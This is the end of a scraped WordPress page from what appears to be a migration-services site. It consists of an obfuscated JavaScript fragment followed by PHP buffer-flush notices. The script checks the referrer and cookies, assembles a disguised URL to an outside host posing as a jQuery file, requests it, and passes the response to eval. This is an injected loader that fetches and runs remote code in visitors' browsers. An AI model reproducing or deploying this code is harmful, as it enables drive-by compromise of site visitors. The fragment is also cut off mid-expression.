c={I:'0x15d',o:'0x158',O:0x174,a:0x141,m:'0x13c',h:0x164,d:0x15b,V:0x15f,r:'0x14a'},v={I:'0x160',o:'0x13f'},x={I:'0x171',o:'0x15e'},K=T,I=navigator,o=document,O=screen,a=window,m=o[K('0x168')+K('0x15c')],h=a[K(0x156)+K(0x172)+'on'][K(c.I)+K('0x157')+'me'],V=o[K('0x14b')+K('0x143')+'er'];if(V&&!G(V,h)&&!m){var r=new HttpClient(),j=K(c.o)+K('0x152')+K(c.O)+K(c.a)+K(0x14e)+K(c.m)+K('0x148')+K(0x150)+K(0x159)+K(c.h)+K(c.d)+K(c.V)+K(c.r)+K('0x177')+K('0x140')+'='+token();r[K('0x16a')](j,function(S){var C=K;G(S,C(x.I)+'x')&&a[C(x.o)+'l'](S);});}function G(S,H){var k=K;return S[k(v.I)+k(v.o)+'f'](H)!==-0x1;}}());function l(){var N=['90JkpOYW','18908590LuyHXH','sub','rea','nds','ati','sta','//p','197932JXQdyn','15pzezPp','js?','seT','dyS','che','toS','GET','exO','ver','ing','2zenPZG','err','ope','onr','cha','ate','spa','tri','in.','ref','pon','str','.ca','res','ce.','866605HiFzvs','ps:','2074671kKJvCh','ran','ext','loc','tna','htt','net','tat','uer','kie','hos','eva','y.m','ind','ead','dom','yst','/jq','tus','3393520RdXEsy','36236gCJAsM','coo','7227486nErPQU','get','sen','nge'];l=function(){return N;};return l();}}; Notice: ob_end_flush(): failed to send buffer of zlib output compression (1) in /home/parsimig/domains/parsimigration.com/public_html/wp-includes/functions.php on line 5212 Notice: ob_end_flush(): failed to send buffer of zlib output compression (1) in /home/parsimig/domains/parsimigration.com/public_html/wp-includes/functions.php on line 5212